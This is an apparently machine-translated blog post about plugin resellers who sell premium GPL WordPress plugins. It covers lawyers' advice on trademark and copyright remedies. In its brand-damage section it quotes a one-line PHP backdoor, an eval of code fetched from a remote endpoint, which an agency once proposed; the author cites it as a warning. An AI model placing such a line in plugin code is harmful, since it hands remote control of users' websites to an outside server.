合法保護您的 GPL WordPress 插件業務免受巨魔攻擊的終極指南

已發表: 2016-01-12

軟件許可可能是一個非常令人困惑的主題，尤其是在開源世界中。合法性和道德的界限並不總是清晰的。但作為專注於銷售 WordPress GPL 插件的企業主，我們有責任徹底了解這些主題。

這篇文章不會涉及道德問題，而是關注法律方面的考慮。它將為您提供一個逐步可行的公式，包括來自該領域經驗豐富的律師的反饋，以保護您的 WordPress 業務免受插件“巨魔”的侵害。

作為過去五年的插件開發人員，我閱讀了大量討論 GPL、它的自由以及與運行符合 GPL 的業務相關的挑戰的文章。但在過去的幾個月裡，這個話題對我來說變得更加重要。

8 月，一個名為 WordPress Plugins (https://twitter.com/plugswp) 的 Twitter 帳戶關注了我。作為一種習慣，我檢查了他們的個人資料以了解有關該用戶的更多信息。我很快發現該處理程序與“wppluginscheap.com”相關聯，這是一個插件和主題“巨魔”，自稱是“廉價高級 WordPress 插件和主題的第一來源”。瀏覽該網站，我發現了許多流行的高級插件，如 Yoast SEO、Backup Buddy、WP Robot 和 50 個高級主題。 每件產品售價不到 10 美元。

雖然我很天真，但我跳上了 WPChat 並開始了一個新線程：

我們一直在編碼威脅，一些巨魔會彈出並以荒謬的價格轉售我們的 GPL 插件/主題。嗯……它就在這裡以 4.00 美元的價格購買 Yoast Premium SEO 怎麼樣……我有點生氣，另一方面也很有趣，因為我知道它總有一天會出現。

我向社區提出了兩個問題：
1.我們如何把它取下來？
2. 你覺得受到威脅嗎？

同時，我去了 Advanced WordPress Facebook 群組，並上傳了以下狀態：

Joost de Valk 和 Thomas Hofter 除非你們開始以低於 10 美元的價格出售您的插件，否則我認為這些人侵犯了您的商標（以及許多其他插件開發人員）。我們如何把它弄下來？

如果您是 AWP 組的成員，您可以在此處查看整個線程。

這兩個主題都引起了很多興趣和討論。我在 WPChat 中收到了 17 條回复，在 AWP Facebook 群組中收到了 84 條評論。一旦回復開始堆積起來，我意識到兩件事：
1. WordPress 插件/主題巨魔是一種流行病——它無處不在！

這已經發生了很長時間，儘管主要是主題和 WooCommerce 插件。參見 gplclub.org 和 sozot.com。 WPAvengers.com 在關閉之前做了類似的事情。
– Leland Fiegel，WPChat 創始人

2. 儘管有數百篇關於 GPL 許可證各個方面的博客文章，但生態系統中仍然存在很多混亂。即使在有影響力的人中。似乎很多人認為這樣做在技術上是可以的（儘管不道德），因為插件和主題是在 GPL 下獲得許可的。

這些機會主義者時不時地冒出來，似乎從來沒有成功過。這是合法的（無論如何，GPL 部分）但不道德。它很懶惰。這對客戶不利，因為貨物的形狀有問題、過時、不受支持和可疑。
– Steven Gliebe，主題開發者和 Pro Plugin Directory 創始人

這是不道德的，但是如果我作為一個在 GPL 下發布的主題/插件商店所有者，我會這麼說，我覺得如果我能這麼說的話，我比那些傢伙更不道德，而且是一個徹頭徹尾的偽君子。
– Ionut Neagu，CodeinWP 創始人

Facebook 上收到的其他評論包括：

如果這些插件是在 GPL 下獲得許可的，那麼恐怕他們什麼也做不了
我認為高級版本不屬於 GPL
這是合法的，在 GPL 下

而且還有更多！

所以在我們開始之前，讓我先澄清一點——

這是完全錯誤的！

即使他們的插件是在開源許可下分發的，開發人員仍然擁有可執行的權利。
這些“插件巨魔”仍可能對商標侵權和/或版權侵權負責。

我想補充一點，我已經閱讀了很多意見，說這些巨魔不會對企業造成傷害。如果是這樣的話，我就不會費心花這麼多時間來編譯這篇文章了。我想藉此機會解釋巨魔對 WordPress 社區不利的原因——對您的企業和 WordPress 用戶都是如此。

為什麼插件巨魔對您的插件業務不利？

收入損失

不管你喜不喜歡，大部分用戶都會從這個網站購買或獲取你的高級插件。特別是 WordPress 新手。如果我是 WordPress 生態系統的新手並正在尋找 SEO 插件，那麼 4 美元的 Yoast SEO 聽起來比全價更具吸引力。我會買的。就像我在購買智能手機或其他產品時總是尋找最好的折扣一樣。我不需要“原始保修”，因為我從未將它用於我購買的任何產品，因此用戶從一開始就沒有考慮到支持。

支持濫用

如果從巨魔那裡購買的插件有任何問題——猜猜誰應該為此負責？當然是真正的開發商/公司。如果與您的品牌相關的藝術品被複製，客戶將與您聯繫。就像我在亞馬遜上購買 HTC 智能手機一樣，當我遇到設備問題時，我會致電 HTC 技術支持，而不是亞馬遜。你會告訴用戶什麼？ “是的，這是我們的手機，但您需要聯繫亞馬遜以獲得技術支持。” 用戶很難消化這種響應。看起來您並沒有站在您的產品後面。

如果從巨魔那裡購買的插件有任何問題——猜猜誰應該為此負責？Tweet

品牌損害

毫無疑問，一些巨魔將惡意代碼注入插件。這樣做的主要動機是在免費分發高級插件的同時產生收入。我親眼目睹了這一點。兩年前，一位來自英國一家大型機構（超過 100 名員工）的高級 SEO 人員找到了我。 . 他提議通過在我們的插件中添加一行簡單的代碼來與我合作：
eval(wp_remote_get( 'http://www.company.com/path/to/api/endpoint/' )['body']);

這個想法是 API 端點將返回隱藏的 URL 以推送其投資組合公司的反向鏈接。他發送的示例之一是：

<a href="”http://www.portfolio-company.com”">Great Company</a>

巨魔可能會在使用您的原始品牌時將惡意代碼注入插件，直接損害您的品牌！

這是在谷歌企鵝之前，是一個偉大的 SEO 黑客。優惠也很棒——每個域名每月 0.1 美元。因此，如果我有 100,000 個使用我的插件的活動域，我可以每月產生 10,000 美元。無需額外花費一分鐘即可獲得收入。厲害吧？顯然我們沒有這樣做，出於各種原因，主要是因為這段代碼非常惡意。它會打開一個遠程後門來對站點做任何你想做的事情。即使該機構僅打算將其用於搜索引擎優化，如果他們的服務器被黑客入侵並且有惡意的人控制了會發生什麼？誰知道有多少合法的 WordPress.org 插件與該機構合作......回到巨魔身上，他們的意圖純粹是財務上的。他們不是為了好玩而推廣您的高級插件，而是為了賺錢。而且，如果他們從事諸如侵犯版權和商標權之類的非法行為，那麼沒有什麼能阻止他們產生諸如代碼注入之類的替代收入流。哦，我忘了說，如果發生這樣的事情，你應該受到責備！這是你的產品，也是你的品牌。

訂閱並獲取我們的書的免費副本

11 種行之有效的技巧，可將您的信用卡糾紛勝訴率提高 740%

感謝訂閱！

- 我們剛剛將您的“11 種經過驗證的技術，可將您的信用卡糾紛勝訴率提高 740%”的副本發送至.

您的電子郵件中有錯字嗎？單擊此處編輯電子郵件地址並再次發送。

為什麼插件巨魔對用戶不利？

出於我提到的許多相同原因，但從用戶的角度來看。

沒有支持

當面臨技術問題時，巨魔無法幫助您。這不是他們的產品，他們對代碼或如何解決任何相關問題一無所知。此外，他們沒有支持資源來做到這一點。如果您嘗試聯繫原始公司，高級插件開發人員擁有跟踪客戶的基礎設施。在您購買原始許可證之前，該公司通常不會為您提供幫助。

插件的非法再分發者不能也不會幫助您解決技術問題。Tweet

沒有自動更新

當今市場上的大多數高級插件都有許可和更新機制（巨魔經常在重新分發插件之前“破解”這部分）。這種自動更新機制的工作方式是每 24 小時一次，插件會檢查原始公司的服務器以查看是否有任何高級版本的更新。它還使用許可證密鑰進行身份驗證。由於 troll 的插件從未使用原始公司的許可證密鑰頒發，因此此更新機制將不起作用。因此，每次安裝非原創高級插件時，都不會自動更新。這很糟糕，因為黑客不斷發現新的創造性漏洞，而過時的高級插件可能是安全漏洞。

盜版 WordPress 插件沒有自動更新機制 – 持續存在安全漏洞！Tweet

重大安全漏洞

還記得我上面提到的惡意的一行代碼嗎？您想讓您的網站後門對黑客開放嗎？這個後門實際上使黑客能夠修改您網站上的每個像素和內容。這只是一個例子，我相信還有很多其他的創意注入。

開源許可證涵蓋哪些內容？

由於開發人員社區對這些問題顯然存在很多困惑，因此我聯繫了我的朋友 Ariel Reinitz 和他的同事 Matthew Hintz，他們是 Lowenstein Sandler LLP 的知識產權 (IP)（專利、商標和版權）律師，一家全國性的公司，辦事處從紐約到帕洛阿爾托。

Ariel 向我解釋說，雖然 WP 插件“巨魔”在技術上可能有權重新分發處於開源許可（例如 GPL）下的代碼，但開源未涵蓋其他知識產權（“IP”）權利這些“巨魔”可能仍在侵犯的許可。

Ariel Reinitz，知識產權律師

以下是 Ariel 對 GPL 的評價：

重要的是要了解大多數 WordPress 插件分發所依據的開源許可證 (GPLv2) 涵蓋（和不涵蓋）的內容：

開源許可證規定瞭如何分發軟件/源代碼。 通常，此類許可允許任何人免費使用、修改等軟件/代碼。 因此，開源項目的源代碼可以被其他方重新分發，而不會違反 GPL 的條款。

簡而言之——GPL 自由允許任何人獲取源代碼並用它做任何他想做的事情，包括分發。我相信社區中在這方面達成了共識。

開源許可證不涵蓋哪些內容？

但是，開源許可證（包括 GPLv2）通常不會擴展到商標。 商標與產品（例如，插件、主題、應用程序等）的品牌方式有關——例如，產品（和/或產品來源的公司）的名稱、標語/口號，以及/或其標誌。 因此，雖然項目的源代碼可以在開源許可下自由再分發，但這樣的許可不會授予他人與項目相關的商標的任何權利（例如，產品名稱、開發它的公司、等等。）。

用非律師的話來說——GPL 不允許使用任何插件的商標，如產品名稱、公司名稱和徽標。愛麗兒給我們舉了一個例子：

因此，例如，如果第三方使用項目的所有原始品牌重新分發 WordPress 插件（例如，使用公司/項目的原始名稱、徽標等進行宣傳），這可能會侵犯原始開發人員的商標權利。 如前所述，開源許可證不允許某人在商業環境中使用他人的品牌。 這一點很重要，因為商標法的主要原則之一是保護消費者不會混淆產品的來源。

商標法的主要原則不僅是為了保護企業，而且是為了保護消費者免於混淆產品的來源。這是重要的注意事項！

認識到許多開源公司註冊、保護和監管其商標權也很重要。 示例包括： Linux 、 MySQL 、 Red Hat和WordPress 。

Ariel 在這裡所說的是，許多開源領域的知名人士都保護和監督他們的商標權。 為什麼我們不應該這樣做？

如果紅帽可以保護和監管他們的商標權，為什麼插件開發人員不能？

除了商標權，Ariel 指出，開發人員還有權對其製作的不屬於源代碼的材料獲得版權保護：

同樣重要的是要認識到 GPL（和其他開源許可證）僅涵蓋插件本身的源代碼。 但是，如果開發人員創建了不屬於源代碼的材料（例如，圖形、宣傳材料、包裝等），這些材料將不屬於 GPL，開發人員沒有義務允許另一方重新分配材料。

例如，看看上面提到的一些“巨魔”網站如何使用“Yoast”插件。雖然這些網站在技術上可能能夠重新分發 Yoast 的源代碼（因為它屬於 GPL），但這些網站還包含諸如 Yoast 的品牌（例如，Yoast 的名稱和徽標，它們是商標）等元素以及由Yoast（例如，喝茶的人的圖形，它不是 Yoast 源代碼的一部分，因此版權歸Yoast 所有，不受 GPL 約束）。

所以——雖然巨魔可能在法律上有權重新分發 Yoast 的源代碼，但 GPL（或其他開源許可證）並沒有賦予他們使用 (a) Yoast 的品牌（商標）或 (b) 其他圖形、材料等的權利.,（版權） 。由於它們不是插件源代碼的一部分，因此這些項目不屬於 GPL，因此這些項目的知識產權 (IP) 權利是開發人員的唯一財產。

由於插件“巨魔”使用開發者的商標和受版權保護的材料（如上面的“Yoast”示例），開發者可以使用法律程序（我們將在下面詳細探討）來執行這些權利，以便阻止、勸阻或至少嘗試限制這些“巨魔”可能對您的業務產生的影響。同樣，即使您的插件是在 GPL 下分發的，也是如此。

什麼受商標保護？

Matthew Hintz，知識產權律師

Matthew 解釋了商標涵蓋的內容：

簡而言之，商標是消費者區分商品或服務來源與其他來源的唯一標識符。 大多數情況下，商標是一個詞、徽標或這些元素的某種組合。 在美國，商標權始於商業用途（稱為“普通法權利”），而不是通過在美國專利商標局 (USPTO) 註冊。 但是，在 USPTO 註冊您的商標可為所有者提供許多普通法權利無法獲得的好處。 值得注意的是，這些證據包括註冊人在整個美國就註冊中規定的商品或服務使用商標的專有權利的證據，註冊人是商標所有者的建設性通知，在美國專利商標局的註冊清單在線數據庫，以及使用符號的能力。 （在註冊之前，TM 符號可以與商標一起使用。）

代碼受商標保護嗎？

在我的研究過程中，我閱讀了一些帖子，其中提到在分叉 GPL 許可插件或主題時，必須重構代碼以確保沒有包含商標標識符作為函數名稱一部分的函數。為了澄清這一點，我問馬修代碼是否也受商標保護，答案如下：

代碼本身不受商標保護。 商標保護消費者與您的商品或服務相關聯的文字或徽標。 那麼，插件商標保護的限制將是用於向消費者推銷插件的單詞或徽標。 那麼商標侵權的根本檢驗是消費者是否會被兩個商標的相似性所混淆。 相似性是通過查看視覺和語音相似性、每個商標的商品/服務的相關程度、商標的獨特性以及商標使用時間等因素來評估的。

用開發人員友好的語言澄清答案：

類名、函數名、變量名和常量名不受商標保護。
另一方面，打印在頁面上並對最終用戶可見的字符串受商標保護。

如何申請商標註冊？

要獲得商標聯邦註冊的好處，您的商標必須在美國專利商標局註冊。 註冊申請必須包括基本信息：申請人/所有人的姓名、商標、與該商標一起使用的商品或服務、在這些商品或服務上使用該商標的證據，以及該商標的首次使用日期. 您的應用的注意事項：

在 USPTO 的 TESS (http://www.uspto.gov/trademark ) 數據庫中搜索相同或相似的商標。 如果申請或已註冊相同或相似的商標，這些可能會成為拒絕您申請的依據。 也可以通過谷歌或其他搜索服務進行搜索，因為一個商標可以在沒有註冊的情況下使用，並且儘管您已經註冊，但對該商標擁有更高的權利。 註冊不會用盡在先用戶的商標權。
如需描述您的商品或服務，請在 USPTO 的 ID 手冊中搜索可接受的語言： http ://tess2.uspto.gov/netahtml/tidm.html 。 您還可以在 TESS 上搜索可接受的語言。
類別是與商品或服務的某些領域相關的一般指示。 例如，可下載插件通常屬於第 9 類，涵蓋所有計算機程序和軟件。
商標申請的費用取決於類別的數量。 一般費用為每類 275 美元，但提供更便宜和更昂貴的申請選項。

提交申請後，USPTO 將審查該申請以確定該商標是否為唯一標識符（即，與先前提交的申請或註冊不具有描述性或混淆性相似）。 美國專利商標局提供申請時間表： http ://www.uspto.gov/trademark/trademark-timelines/trademark-application-and-post-registration-process-timelines 。

請記住，商標保護是地域性的。 例如，在美國的註冊將在美國提供商標保護。

正如馬修所描述的，這個過程並不一定很複雜——但它確實需要時間和精力。我建議請一位中級律師為您做這件事。這項工作應該花費您 200 至 2,000 美元，儘管它會節省您的時間並確保更好的應用程序。無論如何，在你開始之前，谷歌吧！如果您找到與您的確切術語/短語匹配的產品或公司（特別是在相同或相似領域），則很有可能您將無法註冊商標（並且您實際上可能侵犯了他人的商標）。

商標被侵權怎麼辦？

我將從你不應該做的事情開始——如果它是商標侵權，而不是版權，你不應該提交 DMCA 刪除。

DMCA 僅涵蓋版權侵權。 商標沒有類似的規定。 對商標索賠使用 DMCA 刪除通知可能會導致索賠人對虛假陳述負責。

嘗試直接與網站所有者解決問題通常是最簡單的。如果這不成功，您可以對網站所有者、主機等提起法律訴訟。您採取的具體方法可能會針對具體情況，此時，我建議您聯繫律師以了解在您的具體情況下的最佳選擇.

什麼受版權保護？

版權不同於商標。 版權保護以某種表達方式固定的原創作品。 然而，版權保護的一個限制是它只延伸到表達，而不是想法。 受版權保護的作品類別包括文學作品（書籍、代碼）、音樂作品、照片和圖像、電影、錄音等類別。 另一個限制是版權不保護短語或表達方式——這仍然適用於商標保護，只要它們作為消費者的唯一標識符，將商品或服務的來源與其他人區分開來。

當您的版權受到侵犯時該怎麼辦？

最初，嘗試直接聯繫網站所有者通常是最簡單的。在許多情況下，網站所有者並不比您更感興趣的是聘請律師、參與法律訴訟等。嘗試找到 twitter 帳戶、聯繫電子郵件或網站上的聯繫頁面，並發送消息要求刪除您在網站上的商標插件。
如果沒有幫助，您可以發送 DMCA 刪除通知（數字千年版權法案）。有很多生成器可以幫助您創建一個，只需在 google 上搜索“dmca takedown generator”。收到通知後，您需要將其發送給網站所有者、託管公司和 ISP。您也可以選擇向搜索引擎提交通知，以從搜索結果中刪除該網站。要查找託管公司，您可以使用 whoishostingthis.com 等網站。要查找 ISP，您可以使用 http://www.whoismyisp.org/ 等網站。要找到將 DMCA 提交給 ISP/Hosting 的相關鏈接，請在 google 上搜索 ISP_NAME/HOSTING_NAME + DMCA。

或者，您可以對網站所有者、主機等提起法律訴訟。我建議聯繫律師以了解在您的具體情況下這是否是最佳選擇。

結論

我希望這組分步說明能夠為您提供正確的工具來保護您的 GPL 插件業務免受巨魔的侵害。只是一個回顧：

作為企業主，您有資格，並且應該保護您公司的品牌和資產。
商標和版權是合法保護您的插件業務的相對便宜且有效的方法。因此，您應該強烈考慮為您的公司名稱和產品名稱註冊商標。
許多巨魔侵犯了版權（例如，通過提升您的宣傳圖片）和商標（通過使用您的品牌名稱）。通過創建獨特的品牌名稱、徽標和藝術品，您可以生成一個組合來幫助打擊版權侵權。

許多巨魔侵犯了版權和商標。通過創建獨特的品牌名稱、徽標和藝術作品，您可以生成一個組合來幫助打擊版權侵權。Tweet

如果第三方網站在未經您同意的情況下列出了您的高級 GPL 插件或主題以供出售或贈送：

如果該網站使用您的原創作品或其他材料——這很可能侵犯了版權。您可以提交 DMCA 刪除。
如果該網站使用您公司或產品的商標，則很可能是商標侵權。您可以對該網站提起法律訴訟。

如果您對 GPL 的法律和道德影響有任何其他想法，請隨時在下面的評論中分享。

大參考：

針對 WP Migrate DB Pro 的分叉發布 DMCA 刪除通知
GPL 許可證不提供侵犯註冊商標的自由
WordPress GPL 是否被濫用？
為什麼我們要為 GPL 許可代碼付費？